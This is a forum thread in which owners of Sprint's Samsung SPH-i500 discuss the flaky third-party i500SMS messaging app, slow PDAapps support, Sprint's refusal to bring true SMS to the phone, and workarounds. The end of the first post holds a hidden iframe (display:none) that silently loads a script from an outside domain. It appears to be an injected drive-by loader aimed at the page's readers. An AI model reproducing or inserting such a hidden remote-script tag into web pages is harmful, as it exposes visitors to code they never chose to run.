+ Reply to Thread

I500SMS Not Working

Is anybody else having problems with their I500SMS?

I am not getting any of my shortmails via I500SMS, only the tired message noting that I have a shortmail at a certain URL. This has been happening all day<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Orthogonally Persistent

Bad Experience with i500SMS

Yeah, i500SMS is somewhat flaky. Add to that the PDAapps.com support is somewhat flaky, and you have flaky+flaky!

According to Sprint, "real" SMS is supposed to be released no later than December 15. So do what I did. Just write the $19.95 off. Its less than a month away, then you won't have to put up with a flaky app.

Of course, we needn't use the words "flaky" and "Sprint" in close proximity either

Actually I have been using I500SMS since I got my phone (August) and have never experienced this issue. So, I am actually wondering if something has recently happened to prevent I500SMS from 'fetching' shortmails as it has been.

Orthogonally Persistent

i500SMS

I've had i500SMS start doing strange things in the past. Some of the things I've done to solve problems (in this order):

1) Disable it / Reboot / Enable it / Reboot

2) Put in a bogus set of passwords and get error message / put the real set of passwords back it

3) Email PDAapps tech support and wait a couple of weeks for it to "mysteriously" start working again.

Sometimes the problem will get resolved in the sequence. Other time, they obviously have to do something to their gateway to solve the problem.

As I say... flaky product, flaky company. I'm counting the days until real SMS is available and I won't need to deal with these bozos again.

Re: i500SMS

Originally posted by JoeGuru
    I'm counting the days until real SMS is available and I won't need to deal with these bozos again.
    What makes you think "real SMS" will work on the I500?

I agree, nothing I've seen has indicated SPCS will make the i5 sms capable.

For the most part I think i500sms works decently. I find it screws up royally if multiple messages come in at the same time, or right after each other. I also find that when the fun alerts me of a message, If I open it up too quickly and hit the message button, sometimes I500sms gets confused and I lose the message.

Orthogonally Persistent

i500 and Real SMS

The latest word I've heard from both Samsung and Sprint is that there will be upgrades for all of their PDA phones. Has anyone heard anything specifically to the contrary?

According to this thread at hofo, the only phones slated to support SMS are the Treo 600, Nokia 3588i, Samsung A660, and Sanyo 5500.

Since the I500 does not have an appropriate WAP browser, we may be SOL unless the folks at PDAapps are able to work some more magic.

Orthogonally Persistent

i500 and SMS

Interesting... I thought the whole purpose of the upgrade was to get away from a browser environment and do "real" SMS (without having to build up a Vision connection). Let me call my "inside contact" at Samsung and see what he knows.

Here's Sprint's comments on SMS. Forgive any redundancy in posting.

http://tinyurl.com/vvu3

Orthogonally Persistent
    Yeah, but I don't really see how they could get away with not offering it on the i500. That seems to me like a dumb decision that will contribute to their WNP churn. I bet they'll update the existing PDA phones.

jlv

They say they won't upgrade existing PDA phones

Thanks SkyFinGrp. That tells all:
    The carrier’s new Nokia Corp. phone, its Treo 600 device and the new walkie-talkie Sanyo Corp. handsets will support the service once it is officially launched. Older phones will not support the new messaging system.

Orthogonally Persistent
    Yeah, but read the quote: she said "older phones" will not support the SMS messaging. The i500 is *not* an older phone.

I have a call in right now for clarification. I should get an answer back tomorrow.

jlv
    The I500 was released and has been in the field for 3-4 months now. It *is* an older phone.

Orthogonally Persistent
    You would appear to be correct. I spoke with Jenny Stevens (the spokesman who gave the cited quote) with Sprint. I asked her specifically about the SPH-i500 and she replied that there were no plans to make it true SMS.

What a drag. But that's just Sprint!

Lightbulb

I avoided the frustration of Sprint's (lack of) SMS altogether! I downloaded Palm "Mailer" program from electricpocket.com

I've had absolutely NO probs with this at all. It allows me to select addresses directly from the A.B. on the I500

Has anyone else tried it? I'm happy...

What is i500SMS?

I have had my i500 for 2 days. I had an i300 for 2 years and got SMS msgs through an app called WebAlerts[sp?] which was text based. Is everything done through Blazer on the i500?

What do you mean by "Just write the $19.95 off"? Is i500SMS something I buy to use instead of Blazer to receive my text messages?

Someone sent me a test text message and then I tried the "extract info" menu option and the [launch] button which ultimately started Blazer and have me a Cannot Display Requested Page error. Is that what others are getting today?
    Chuck

Orthogonally Persistent
    Yes, basically, i500SMS is a 3rd party app by PDAapps.com. My experience is that it is *not* stable on the i500. The PDAapps guys have not really shown themselves to be responsive at tech support.

i500SMS does allow "sort of" SMS and overcomes the browser link issue when dealing with Sprint's short mail system. What it does, when you receive one of the wap link notifications, is it builds up a Vision connection and then initiates a process to fetch the message via a proxy server at PDAapps (supposedly through SMPP).

The problem I've experienced is that sometimes I'm in a marginal area and the Vision connection (which launches automatically) isn't built up. After the i500SMS failure, I begin experiencing phone weirdness (Fatal Exceptions and such) increasing to the point I finally have to hard reset and reload the phone.

So I have i500SMS, but keep it disabled until I actually need it (when someone sends me a short mail). Then I wait until I"m in a reliable coverage area, enable it, fetch the messages and disable it again. This is kludgy but it seems to work. As I say, the PDAapps guys just dismiss it usually saying something like "well, we don't have any marginal areas around here so we can't test it."

Supposedly, Sprint is going to fix this, but they haven't said how. We know that it isn't going to be through implementing "real" SMS in the short term.

AS an update, my I500SMS is working again. I don't know what happen but it stopped working around the time Sprint was apparently making some changes to short mail and servers. Other than this one hiccup, mine has been working flawlessly since August when I first picked it up. WoooooHooooo!!!!!!